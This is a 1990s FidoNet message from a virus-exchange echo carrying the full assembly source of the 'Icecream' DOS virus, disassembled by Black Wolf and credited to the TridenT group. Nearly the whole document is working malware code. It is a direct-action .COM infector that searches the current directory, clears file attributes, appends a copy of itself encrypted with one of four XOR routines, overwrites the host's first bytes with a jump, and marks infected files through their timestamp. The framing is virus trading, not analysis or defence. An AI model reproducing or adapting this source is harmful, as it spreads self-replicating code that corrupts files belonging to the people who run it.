;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg  : 41 of 54
; From : MeteO                               2:5030/136      Tue 09 Nov 93 09:15
; To   : -  *.*  -                                           Fri 11 Nov 94 08:10
; Subj : ICECREAM.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 17:48)
;* To   : Ron Toler
;* Subj : ICECREAM.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;Icecream Virus by the TridenT virus research group.

;This is a simple direct-action com virus that uses one of
;4 encryption algorithms to encrypt itself each time it infects a file.
;It will infect one .COM file in the current directory every time it is
;executed.  It marks infections with the time stamp.


;Disassembly by Black Wolf

.model tiny
.code
        org     100h

start:
        db      0e9h,0ch,0       ;jmp     Virus_Entry

Author_Name     db      'John Tardy'

        db      0E2h,0FAh
Virus_Entry:
        push    ax
        call    Get_Offset
Get_Offset:
        pop     ax
        sub     ax,offset Get_Offset

        db      89h,0c5h         ;mov     bp,ax
        lea     si,[bp+Storage]
        mov     di,100h                 ;Restore file
        movsw
        movsb

        mov     ah,1Ah
        mov     dx,0f900h
        int     21h                     ;Set DTA

        mov     ah,4Eh

FindFirstNext:
        lea     dx,[bp+ComMask]
        xor     cx,cx
        int     21h                     ;Find File
        jnc     InfectFile

Restore_DTA:
        mov     ah,1Ah
        mov     dx,80h
        int     21h                     ;Set DTA to default

        mov     bx,offset start
        pop     ax                      ;Return to host
        push    bx
        retn

InfectFile:
        mov     ax,4300h
        mov     dx,0f91eh
        int     21h                     ;Get file attribs

        push    cx                      ;save 'em
        mov     ax,4301h
        xor     cx,cx
        int     21h                     ;Set them to 0

        mov     ax,3D02h
        int     21h                     ;Open file

        mov     bx,5700h
        xchg    ax,bx
        int     21h                     ;Get file time

        push    cx
        push    dx                      ;save it
        and     cx,1Fh
        cmp     cx,1                    ;check for infection
        jne     ContinueInfection
        db      0e9h,69h,0              ;jmp     DoneInfect

ContinueInfection:
        mov     ah,3Fh
        lea     dx,[bp+Storage]
        mov     cx,3
        int     21h                     ;Read in first 3 bytes

        mov     ax,cs:[Storage+bp]
        cmp     ax,4D5Ah                ;Is it an EXE?
        je      DoneInfect
        cmp     ax,5A4Dh
        je      DoneInfect              ;Other EXE signature?

        pop     dx
        pop     cx
        and     cx,0FFE0h               ;Change stored time values
        or      cx,1                    ;to mark infection
        push    cx
        push    dx

        mov     ax,4202h                ;Go to the end of the file
        call    Move_FP
        sub     ax,3
        mov     cs:[JumpSize+bp],ax        ;Save jump size

        add     ax,10Fh                    ;Save encryption starting
        mov     word ptr [bp+EncPtr1+1],ax ;point....
        mov     word ptr [bp+EncPtr2+1],ax
        mov     word ptr [bp+EncPtr3+1],ax
        mov     word ptr [bp+EncPtr4+1],ax
        call    SetupEncryption            ;Encrypt virus

        mov     ah,40h
        mov     dx,0fa00h
        mov     cx,1F5h
        int     21h                     ;Write virus to file

        mov     ax,4200h
        call    Move_FP                 ;Go to the beginning of file

        mov     ah,40h
        lea     dx,[bp+JumpBytes]
        mov     cx,3
        int     21h                     ;Write in jump

        call    FinishFile
        jmp     Restore_DTA

DoneInfect:
        call    FinishFile
        mov     ah,4Fh
        jmp     FindFirstNext

Move_FP:
        xor     cx,cx
        xor     dx,dx
        int     21h
        ret

FinishFile:
        pop     si dx cx
        mov     ax,5701h                ;Reset file time/date stamp
        int     21h                     ;(or mark infection)

        mov     ah,3Eh
        int     21h                     ;Close new host file

        mov     ax,4301h
        pop     cx
        mov     dx,0fc1eh
        int     21h                     ;Restore old attributes

        push    si
        retn

Message         db      ' I scream, you scream, we both '
        db      'scream for an ice-cream! '

SetupEncryption:
        xor     byte ptr [bp+10Dh],2
        xor     ax,ax
        mov     es,ax
        mov     ax,es:[46ch]            ;Get random number
        push    cs
        pop     es
        push    ax
        and     ax,7FFh
        add     ax,1E9h
        mov     word ptr [bp+EncSize1+1],ax
        mov     word ptr [bp+EncSize2+1],ax
        mov     word ptr [bp+EncSize3+1],ax
        mov     word ptr [bp+EncSize4+1],ax
        pop     ax
        push    ax
        and     ax,3
        shl     ax,1
        mov     si,ax
        mov     ax,[bp+si+EncData1]
        add     ax,bp
        mov     si,ax
        lea     di,[bp+103h]
        movsw
        movsw
        movsw
        movsw                   ;Copy Encryption Algorithm
        pop     ax
        stosb
        movsb
        mov     dl,al
        lea     si,[bp+103h]
        mov     di,0fa00h
        mov     cx,0Ch
        rep     movsb
        lea     si,[bp+10Fh]
        mov     cx,1E9h

EncryptVirus:
        lodsb
        db      30h,0d0h                ;xor     al,dl
        stosb
        loop    EncryptVirus

        cmp     dl,0
        je      KeyWasZero
        retn

KeyWasZero:                                     ;If key is zero, increase
        mov     si,offset AuthorName    ;jump size and place name
        mov     di,0fa00h               ;at beginning....
        mov     cx,0Ah
        rep     movsb
        mov     ax,cs:[JumpSize+bp]
        add     ax,0Ch
        mov     cs:[JumpSize+bp],ax
        retn

        db      '[TridenT]'

EncData1        dw      02beh
EncData2        dw      02c7h
EncData3        dw      02d0h
EncData4        dw      02d9h

Encryptions:
;------------------------------------------------------------
EncPtr1:
        mov     si,0
EncSize1:
        mov     cx,0
        xor     byte ptr [si],46h
;------------------------------------------------------------
EncPtr2:
        mov     di,0
EncSize2:
        mov     cx,0
        xor     byte ptr [di],47h
;------------------------------------------------------------
EncSize3:
        mov     cx,0
EncPtr3:
        mov     si,0
        xor     byte ptr [si],46h
;------------------------------------------------------------
EncSize4:
        mov     cx,0
EncPtr4:
        mov     di,0
        xor     byte ptr [di],47h
;------------------------------------------------------------

AuthorName      db      'John Tardy'

JumpBytes       db      0E9h
JumpSize        dw      0

ComMask         db      '*.CoM',0

Storage         dw      20CDh
        db      21h

end     start

;-+-  GEcho 1.10+
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
;    þ The MeÂeO
;
;/x            Include false conditionals in listing
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)